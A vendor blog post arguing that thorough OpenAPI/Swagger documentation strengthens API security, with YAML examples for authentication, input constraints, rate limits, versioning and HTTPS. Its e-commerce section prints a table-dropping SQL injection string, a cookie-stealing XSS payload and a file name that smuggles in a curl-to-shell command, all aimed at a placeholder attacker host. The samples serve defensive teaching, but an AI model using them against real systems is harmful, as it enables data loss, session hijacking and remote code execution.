Why Complete API Documentation Makes Your APIs More Secure

Author
Impart Security
Published on
April 16, 2024
Read time
4
Impart Security
April 16, 2024
4
min

Open API documentation is often overlooked as a crucial aspect of security. Let’s explore its relevance in security posture using Swagger (now known as Open API Specifications) files to delve into various aspects and specific examples.


Clear Understanding of Functionality

Documentation enables both developer and security teams to focus on their relative priorities with confidence in an API’s purpose, functionality, and constraints.


Developers can build secure and efficient applications, while reducing the likelihood of security vulnerabilities due to incorrect implementation or misuse.


Security teams can better conduct threat modeling exercises, come up with appropriate testing examples and patterns, and gather context from development teams without needing to touch production systems like databases.


Proper Authentication and Authorization

API documentation often outlines the required authentication and authorization mechanisms, such as API keys, OAuth, or JWT tokens. This helps developers implement the correct security measures to protect sensitive data and prevent unauthorized access to the API.


Example: In a Swagger file, you can define the security schemes for your API and apply them to the relevant endpoints.

components:
 securitySchemes:
   ApiKeyAuth:
     type: apiKey
     in: header
     name: X-API-KEY
   OAuth2:
     type: oauth2
     flows:
       ...

paths:
/users:
   get:
     ...
     security:
       - ApiKeyAuth: []
       - OAuth2: [read:users]


Having a clear understanding of what types of authentication and authorization techniques are being used can help security teams make sure that secure protocols are in place, as well as where they might not being used.


Error Handling and Input Validation

Good API documentation specifies the expected input formats and data types, allowing developers to implement proper input validation and error handling. This helps prevent security issues such as SQL injection, cross-site scripting (XSS), and buffer overflows that can occur due to improper input validation.


Example: In a Swagger file, you can define the expected input format and data types for each parameter, including constraints like minimum and maximum lengths.

paths:
 /users/{id}:
   get:
     ...
     parameters:
       - name: id
         in: path
         description: User ID
         required: true
         schema:
           type: integer
           format: int64
           minimum: 1


Rate Limiting and Quotas

API documentation should provide information about rate limiting and quotas to prevent abuse and denial-of-service (DoS) attacks. This helps maintain the stability and security of the API and the underlying infrastructure.


Example: While rate limiting and quotas are often implemented on the server-side, you can include this information in the description or an x-* field in the Swagger file to inform developers about the limits.

paths:
 /users:
   get:
     ...
     x-rateLimit: 1000 requests per minute


Versioning and Deprecation

Well-documented APIs include information about versioning and deprecated features. This helps developers stay up-to-date with the latest security improvements and avoid using potentially insecure or outdated features.


Example: In a Swagger file, you can use basePath or version your API endpoints to reflect different versions, and use the deprecated flag for any deprecated operations.


openapi: "3.0.0"
servers:
 - url: https://api.example.com/v2

paths:
 /users/{id}:
   get:
     ...
     deprecated: true


Secure Communication

API documentation should describe the supported communication protocols and encryption methods, such as HTTPS and TLS, to ensure secure data transmission between the client and server.


Example: In a Swagger file, you can specify the secure communication protocol by setting the  url  field in the  servers  section to use HTTPS.

openapi: "3.0.0"
servers:
 - url: <https://api.example.com/v2>


API Documentation in Practice: E-Commerce Use Cases

Imagine an online e-commerce store that allows users to register for an account to purchase products. The registration form typically requires the user to provide their name, email, password, and other personal information.


Without proper input validation, the online e-commerce store is vulnerable to various security attacks with severe consequences. Here are some specific examples of attacks that may arise due to the lack of input validation:

  • SQL Injection: If the e-commerce store's registration form doesn't validate user input, an attacker can exploit this by entering specially crafted SQL commands into the form fields. This could lead to unauthorized access to the database, data leakage, or even deletion of data. For example, an attacker could input the following into the email field:

dummy@example.com'; DROP TABLE users;--

If input validation is not in place, the SQL command might be executed, potentially dropping the  users  table and causing data loss.


  • Cross-Site Scripting (XSS): An attacker could exploit input validation weaknesses by injecting malicious JavaScript code into the form fields, such as the name field. If the store's website doesn't properly sanitize and validate the input, the malicious code might be executed when the data is displayed elsewhere on the site. This can lead to cookie theft, session hijacking, or defacement of the website. For example, an attacker could enter the following into the name field:

< script > document.location='https://attacker.example.com/steal?cookie='+document.cookie; < /script >

When an administrator views the user's name in the admin panel, the script might be executed, sending the administrator's session cookie to the attacker's server, leading to session hijacking.

  • Command Injection: If the e-commerce store uses user input to construct and execute system commands, an attacker can potentially inject malicious commands into the input fields. This can lead to unauthorized access, data exfiltration, or even remote code execution. For example, if the store processes user-uploaded images with a command like:

convert input.jpg output.jpg

An attacker could upload an image with a filename like input.jpg; curl <https://attacker.example.com/malware> | sh . Without proper input validation, the server might execute the malicious command, leading to the download and execution of malware.


By implementing proper input validation, the e-commerce store can significantly reduce the likelihood of these attacks, protecting its data, users, and overall system integrity.


Conclusion

Proper API documentation plays a crucial role in ensuring the security of APIs and the applications built using them. By providing clear explanations of functionality, authentication mechanisms, input validation, rate limiting, versioning, secure communication, and security best practices, developers can better understand and implement the necessary security measures. This reduces the likelihood of vulnerabilities and promotes secure coding practices. Using tools like Swagger (OpenAPI Specification) can help standardize and simplify the process of creating and maintaining secure API documentation.


Meet a Co-Founder

Want to learn more about WAF and API security? Speak with an Impart Co-Founder!

See why security teams love us